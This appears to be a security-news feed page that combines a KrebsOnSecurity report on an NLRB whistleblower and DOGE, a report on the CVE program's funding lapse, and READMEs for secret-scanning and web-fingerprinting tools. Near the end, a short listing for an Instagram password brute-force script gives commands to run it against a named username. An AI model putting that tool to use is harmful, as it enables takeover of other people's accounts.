The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.

But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.

An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.

Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.

Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.

As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.

“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.

Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.

Berulis shared screenshots with KrebsOnSecurity showing that on the day the NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.

An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.

Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.

An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.

Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.

“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”

Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.

“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”

Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.

“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”

For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.

“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”

Further reading: Berulis’s complaint (PDF).

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown


Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use online version here: TruffleHog Explorer


🚀 Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
  • Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

📥 Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

📂 How to Use

  1. Upload TruffleHog JSON Findings:
  2. Click on the "Load Data" section and select your .json files from TruffleHog output.
  3. Multiple files are supported.
  4. Apply Filters:
  5. Choose filters such as repository, detector type, and verification status.
  6. Utilize the date range picker to narrow down findings.
  7. Leverage the search function to locate specific findings quickly.
  8. Review Findings:
  9. Click on a finding to expand and view its details.
  10. Use the action buttons to verify or reject findings.
  11. Add comments and annotations for better tracking.
  12. Export Results:
  13. Export verified or filtered findings for reporting.
  14. Save session data for future review and analysis.
  15. Save Your Progress:
  16. Save your session and resume later without losing any progress.
  17. Automatic backup feature to prevent data loss.

Happy Securing! 🔒



The Need for a Strong CVE Program

The CVE program is the foundation for standardized vulnerability disclosure and management. With its future uncertain, global organizations face challenges.

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown


This project is a command line tool and python library that uses Wappalyzer extension (and its fingerprints) to detect technologies. Other projects emerged after discontinuation of the official open source project are using outdated fingerpints and lack accuracy when used on dynamic web-apps, this project bypasses those limitations.


Installation

Before installing wappalyzer, you will to install Firefox and geckodriver/releases">geckodriver. Below are detailed steps for setting up geckodriver but you may use google/youtube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
  3. For Windows: geckodriver-vX.XX.X-win64.zip
  4. For macOS: geckodriver-vX.XX.X-macos.tar.gz
  5. For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  6. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

To ensure Selenium can locate the GeckoDriver executable: - Windows: 1. Move the geckodriver.exe to a directory (e.g., C:\WebDrivers\). 2. Add this directory to the system's PATH: - Open Environment Variables. - Under System Variables, find and select the Path variable, then click Edit. - Click New and enter the directory path where geckodriver.exe is stored. - Click OK to save. - macOS/Linux: 1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH. 2. Use the following command in the terminal: bash sudo mv geckodriver /usr/local/bin/ Ensure /usr/local/bin/ is in your PATH.

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated container e.g. venv or docker. You may also --break-system-packages to do a 'regular' install but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  1. Build and run with Docker Compose:
docker compose up -d
  1. To scan URLs using the Docker container:

  2. Scan a single URL:

docker compose run --rm wappalyzer -i https://example.com
  • Scan Multiple URLs from a file:
docker compose run --rm wappalyzer -i https://example.com -oJ output.json

For Users

Some common usage examples are given below, refer to list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
  • fast: Quick HTTP-based scan (sends 1 request)
  • balanced: HTTP-based scan with more requests
  • full: Complete scan using wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The python library is a available on pypi as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
  • 'fast': Quick HTTP-based scan
  • 'balanced': HTTP-based scan with more requests
  • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
"https://github.com": {
"Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
"lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
"React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]},
"https://google.com" : {},
"https://example.com" : {},
}}

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files, /robots.txt annd does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


Funding Expires for Key Cyber Vulnerability Database

A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program — which is traditionally funded each year by the Department of Homeland Security — expires on April 16.

A letter from MITRE vice president Yosry Barsoum, warning that the funding for the CVE program will expire on April 16, 2025.

Tens of thousands of security flaws in software are found and reported every year, and these vulnerabilities are eventually assigned their own unique CVE tracking number (e.g. CVE-2024-43573, which is a Microsoft Windows bug that Redmond patched last year).

There are hundreds of organizations — known as CVE Numbering Authorities (CNAs) — that are authorized by MITRE to bestow these CVE numbers on newly reported flaws. Many of these CNAs are country and government-specific, or tied to individual software vendors or vulnerability disclosure platforms (a.k.a. bug bounty programs).

Put simply, MITRE is a critical, widely-used resource for centralizing and standardizing information on software vulnerabilities. That means the pipeline of information it supplies is plugged into an array of cybersecurity tools and services that help organizations identify and patch security holes — ideally before malware or malcontents can wriggle through them.

“What the CVE lists really provide is a standardized way to describe the severity of that defect, and a centralized repository listing which versions of which products are defective and need to be updated,” said Matt Tait, chief operating officer of Corellium, a cybersecurity firm that sells phone-virtualization software for finding security flaws.

In a letter sent today to the CVE board, MITRE Vice President Yosry Barsoum warned that on April 16, 2025, “the current contracting pathway for MITRE to develop, operate and modernize CVE and several other related programs will expire.”

“If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure,” Barsoum wrote.

MITRE told KrebsOnSecurity the CVE website listing vulnerabilities will remain up after the funding expires, but that new CVEs won’t be added after April 16.

A representation of how a vulnerability becomes a CVE, and how that information is consumed. Image: James Berthoty, Latio Tech, via LinkedIn.

DHS officials did not immediately respond to a request for comment. The program is funded through DHS’s Cybersecurity & Infrastructure Security Agency (CISA), which is currently facing deep budget and staffing cuts by the Trump administration. The CVE contract available at USAspending.gov says the project was awarded approximately $40 million last year.

Former CISA Director Jen Easterly said the CVE program is a bit like the Dewey Decimal System, but for cybersecurity.

“It’s the global catalog that helps everyone—security teams, software vendors, researchers, governments—organize and talk about vulnerabilities using the same reference system,” Easterly said in a post on LinkedIn. “Without it, everyone is using a different catalog or no catalog at all, no one knows if they’re talking about the same problem, defenders waste precious time figuring out what’s wrong, and worst of all, threat actors take advantage of the confusion.”

John Hammond, principal security researcher at the managed security firm Huntress, told Reuters he swore out loud when he heard the news that CVE’s funding was in jeopardy, and that losing the CVE program would be like losing “the language and lingo we used to address problems in cybersecurity.”

“I really can’t help but think this is just going to hurt,” said Hammond, who posted a Youtube video to vent about the situation and alert others.

Several people close to the matter told KrebsOnSecurity this is not the first time the CVE program’s budget has been left in funding limbo until the last minute. Barsoum’s letter, which was apparently leaked, sounded a hopeful note, saying the government is making “considerable efforts to continue MITRE’s role in support of the program.”

Tait said that without the CVE program, risk managers inside companies would need to continuously monitor many other places for information about new vulnerabilities that may jeopardize the security of their IT networks. Meaning, it may become more common that software updates get mis-prioritized, with companies having hackable software deployed for longer than they otherwise would, he said.

“Hopefully they will resolve this, but otherwise the list will rapidly fall out of date and stop being useful,” he said.

Update, April 16, 11:00 a.m. ET: The CVE board today announced the creation of non-profit entity called The CVE Foundation that will continue the program’s work under a new, unspecified funding mechanism and organizational structure.

“Since its inception, the CVE Program has operated as a U.S. government-funded initiative, with oversight and management provided under contract,” the press release reads. “While this structure has supported the program’s growth, it has also raised longstanding concerns among members of the CVE Board about the sustainability and neutrality of a globally relied-upon resource being tied to a single government sponsor.”

The organization’s website, thecvefoundation.org, is less than a day old and currently hosts no content other than the press release heralding its creation. The announcement said the foundation would release more information about its structure and transition planning in the coming days.

Update, April 16, 4:26 p.m. ET: MITRE issued a statement today saying it “identified incremental funding to keep the programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry and government over the last 24 hours. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE and CWE as global resources.”

From Deployment to Visibility: Cisco Secure Client’s Cloud Transformation

Cisco Secure Client can now be deployed and managed via Client Management in Cisco XDR.

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is on development)

(Chrome should be downloaded in device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


Homeland Security Email Tells a US Citizen to ‘Immediately’ Self-Deport

An email sent by the Department of Homeland Security instructs people in the US on a temporary legal status to leave the country. But who the email actually applies to—and who actually received it—is far from clear.
❌